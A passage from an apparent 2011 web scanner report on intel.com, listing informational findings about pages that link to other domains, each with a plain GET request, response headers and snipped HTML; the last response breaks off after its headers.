...[SNIP]...
<br />
<a href="http://www.adobe.com/go/getflashplayer">
<img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" border="0"/>
</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.120. http://www.intel.com/itcenter/topics/virtualization/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/topics/virtualization/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/itcenter/topics/virtualization/index.htm?iid=subhdr+itc_virtualization
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /itcenter/topics/virtualization/index.htm?iid=subhdr+itc_virtualization HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57241

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="en_us">
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.121. http://www.intel.com/jobs/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /jobs/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/jobs/index.htm?iid=gg_about+intel_jobs
The response contains the following links to other domains:
  • http://greenrankings.newsweek.com/companies/view/intel/
  • http://images.businessweek.com/ss/09/09/0903_places_to_launch_a_career/21.htm
  • http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/98.html
  • http://money.cnn.com/magazines/fortune/bestcompanies/2011/snapshots/51.html
  • http://twitter.com/JobsatIntel
  • http://www.adobe.com/go/getflashplayer
  • http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif
  • http://www.facebook.com/DiscoverIntel
  • http://www.intc.com/
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.linkedin.com/company/intel-corporation/careers
  • http://www.twitter.com/jobsatintel
  • http://www.youtube.com/user/channelintel

Request

GET /jobs/index.htm?iid=gg_about+intel_jobs HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<li><a href="http://twitter.com/JobsatIntel">Follow us on Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/DiscoverIntel">Facebook</a>
...[SNIP]...
</a>
<a id="LHC-investor-relations-menu" href="http://www.intc.com">Investor Relations</a>
...[SNIP]...
<span class="item-image-right"><a href="http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/98.html" target="_blank" title="Intel-simply a great place to work"><img src="/jobs/images/homepage/thumbnails/intel-thumb.jpg" height="75" width="100" alt="Intel-simply a great place to work" title="Intel-simply a great place to work" border="0" />
...[SNIP]...
<h3><a href="http://money.cnn.com/magazines/fortune/bestcompanies/2011/snapshots/51.html" target="_blank" title="They're smiling again...">Yes, we're one of the best places to work!&nbsp;&gt;</a>
...[SNIP]...
<span class="item-image-right"><a href="http://greenrankings.newsweek.com/companies/view/intel/" target="_blank" title="We're committed to the environment"><img src="/jobs/images/homepage/thumbnails/newsweek-thumb.jpg" height="75" width="100" alt="We're committed to the environment" title="We're committed to the environment" border="0" />
...[SNIP]...
<h3><a href="http://greenrankings.newsweek.com/companies/view/intel/" title="We're committed to the environment">We're committed to the environment&nbsp;&gt;</a>
...[SNIP]...
<span class="item-image-right"><a href="http://images.businessweek.com/ss/09/09/0903_places_to_launch_a_career/21.htm" target="_blank" title="Intel named on BusinessWeek.com's Hottest Employers"><img src="/jobs/images/homepage/thumbnails/businessweek-thumb.jpg" height="75" width="100" alt="Intel named on BusinessWeek.com's Hottest Employers" title="Intel named on BusinessWeek.com's Hottest Emp
...[SNIP]...
<h3><a href="http://images.businessweek.com/ss/09/09/0903_places_to_launch_a_career/21.htm" target="_blank" title="Intel named on BusinessWeek.com's Hottest Employers">Intel named on BusinessWeek.com's Hottest Employers&nbsp;&gt;</a>
...[SNIP]...
<li><a title="Twitter" href="http://www.twitter.com/jobsatintel"><img height="23" width="23" alt="Twitter" src="http://blogs.intel.com/sitewide/pix/icons/icn-twitter-23.gif" /></a> <a href="http://www.twitter.com/jobsatintel" target="_blank" title="Twitter">Twitter</a>
...[SNIP]...
<li><a title="Facebook" href="http://www.facebook.com/DiscoverIntel"><img height="23" width="23" alt="Facebook" src="http://blogs.intel.com/sitewide/pix/icons/icn-facebook-23.gif" /></a> <a href="http://www.facebook.com/DiscoverIntel" target="_blank" title="Facebook">Facebook</a>
...[SNIP]...
<li><a title="LinkedIn" href="http://www.linkedin.com/company/intel-corporation/careers"><img height="23" width="23" alt="LinkedIn" src="/Assets/Image/thumbnails/icn-linkedin-23.png" /></a> <a href="http://www.linkedin.com/company/intel-corporation/careers" target="_blank" title="LinkedIn">LinkedIn</a>
...[SNIP]...
<li><a title="YouTube" href="http://www.youtube.com/user/channelintel#grid/user/267DC6DEE5764F12"><img height="23" width="23" alt="YouTube" src="http://blogs.intel.com//sitewide/pix/icons/icn-youtube-23.gif" /></a> <a href="http://www.youtube.com/user/channelintel#grid/user/267DC6DEE5764F12" target="_blank" title="YouTube">YouTube</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
<br />
<a href="http://www.adobe.com/go/getflashplayer">
<img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" border="0"/>
</a>
...[SNIP]...

17.122. http://www.intel.com/learn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /learn

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/learn?iid=gg_play+cdz
The response contains the following links to other domains:
  • http://delicious.com/post?url=http://www.intel.com/learn
  • http://digg.com/submit?phase=2&url=http://www.intel.com/learn
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.stumbleupon.com/submit?url=http://www.intel.com/learn

Request

GET /learn?iid=gg_play+cdz HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Content-Type: text/html;charset=utf-8
Content-Language: en
Server: IA Web Server
Date: Sat, 05 Feb 2011 23:20:07 GMT
Content-Length: 24321
Connection: close
Set-Cookie: JSESSIONID=GHGCNNbHpttjHghb2WC15nPHQnTFbKPq8JhhwZPTm9gXw6qwZsvw!-280077424; path=/; HttpOnly=


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
...[SNIP]...
<li class="digg"><a href="http://digg.com/submit?phase=2&url=http://www.intel.com/learn" title="digg" target="_blank">digg</a>
...[SNIP]...
<li class="dlcs"><a href="http://delicious.com/post?url=http://www.intel.com/learn" title="delicious" target="_blank">delicious</a>
...[SNIP]...
<li class="stmbl"><a href="http://www.stumbleupon.com/submit?url=http://www.intel.com/learn" title="stumble upon" target="_blank">stumble upon</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.123. http://www.intel.com/learn/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /learn/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/learn/?iid=gg_play+cdz
The response contains the following links to other domains:
  • http://delicious.com/post?url=http://www.intel.com/learn/
  • http://digg.com/submit?phase=2&url=http://www.intel.com/learn/
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.stumbleupon.com/submit?url=http://www.intel.com/learn/

Request

GET /learn/?iid=gg_play+cdz HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Content-Type: text/html;charset=utf-8
Content-Language: en
Server: IA Web Server
Date: Sat, 05 Feb 2011 23:20:47 GMT
Content-Length: 24633
Connection: close
Set-Cookie: JSESSIONID=qScvNNbP1hGdDtwK9LLGGRhbMwc9nFyx1LppvTGK87ScvqBhHjfR!1205360102; path=/; HttpOnly=


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
...[SNIP]...
<li class="digg"><a href="http://digg.com/submit?phase=2&url=http://www.intel.com/learn/" title="digg" target="_blank">digg</a>
...[SNIP]...
<li class="dlcs"><a href="http://delicious.com/post?url=http://www.intel.com/learn/" title="delicious" target="_blank">delicious</a>
...[SNIP]...
<li class="stmbl"><a href="http://www.stumbleupon.com/submit?url=http://www.intel.com/learn/" title="stumble upon" target="_blank">stumble upon</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.124. http://www.intel.com/learn/buying-guides/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /learn/buying-guides/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/learn/buying-guides/?iid=subhdr+learn_buyguides
The response contains the following links to other domains:
  • http://delicious.com/post?url=http://www.intel.com/learn/buying-guides/
  • http://digg.com/submit?phase=2&url=http://www.intel.com/learn/buying-guides/
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.stumbleupon.com/submit?url=http://www.intel.com/learn/buying-guides/

Request

GET /learn/buying-guides/?iid=subhdr+learn_buyguides HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Content-Type: text/html;charset=utf-8
Content-Language: en
Server: IA Web Server
Date: Sat, 05 Feb 2011 23:20:52 GMT
Content-Length: 24668
Connection: close
Set-Cookie: JSESSIONID=hPGSNNbT4nmGHpvL3zF8p68gXV2tK8F8fhBKQy1rZy8Y3NTLqsgw!1651646670; path=/; HttpOnly=


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
               

...[SNIP]...
<li class="digg"><a href="http://digg.com/submit?phase=2&url=http://www.intel.com/learn/buying-guides/" title="digg" target="_blank">digg</a>
...[SNIP]...
<li class="dlcs"><a href="http://delicious.com/post?url=http://www.intel.com/learn/buying-guides/" title="delicious" target="_blank">delicious</a>
...[SNIP]...
<li class="stmbl"><a href="http://www.stumbleupon.com/submit?url=http://www.intel.com/learn/buying-guides/" title="stumble upon" target="_blank">stumble upon</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.125. http://www.intel.com/learn/practical-advice/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /learn/practical-advice/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/learn/practical-advice/?iid=gg_play+howto
The response contains the following links to other domains:
  • http://delicious.com/post?url=http://www.intel.com/learn/practical-advice/
  • http://digg.com/submit?phase=2&url=http://www.intel.com/learn/practical-advice/
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.stumbleupon.com/submit?url=http://www.intel.com/learn/practical-advice/

Request

GET /learn/practical-advice/?iid=gg_play+howto HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Content-Type: text/html;charset=utf-8
Content-Language: en
Server: IA Web Server
Date: Sat, 05 Feb 2011 23:20:47 GMT
Content-Length: 29358
Connection: close
Set-Cookie: JSESSIONID=GYWFNNbPzghpbTnZMMgF0KMHNPqz2vSvXck1yXWcK7PQgXlqx1Jm!1205360102; path=/; HttpOnly=


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
...[SNIP]...
<li class="digg"><a href="http://digg.com/submit?phase=2&url=http://www.intel.com/learn/practical-advice/" title="digg" target="_blank">digg</a>
...[SNIP]...
<li class="dlcs"><a href="http://delicious.com/post?url=http://www.intel.com/learn/practical-advice/" title="delicious" target="_blank">delicious</a>
...[SNIP]...
<li class="stmbl"><a href="http://www.stumbleupon.com/submit?url=http://www.intel.com/learn/practical-advice/" title="stumble upon" target="_blank">stumble upon</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.126. http://www.intel.com/p/en_US/business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /p/en_US/business

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /p/en_US/business?iid=gg_work-en_US+home_business_portal HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947549093; s_lv_s=Less%20than%201%20day; cf=0; gpv_p18=cim%3A/index.htm; s_sq=%5B%5BB%5D%5D; countrylang=United%20States%20-%20English; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=UTF-8
IBM-Web2-Location: /p/portal/business/home/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iDABcTQ0N3A0sL_0BTA8_gEENXH3N3IwMDQ6B8JB55AwK6vfSj0nPyk4D2hINsxm8SWB4HcDTQ9_PIz03VL8iNqAwOSFcEAAErtcg!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie, Accept-Encoding
Content-Language: en-US
Server: IA Web Server
Date: Sat, 05 Feb 2011 23:12:07 GMT
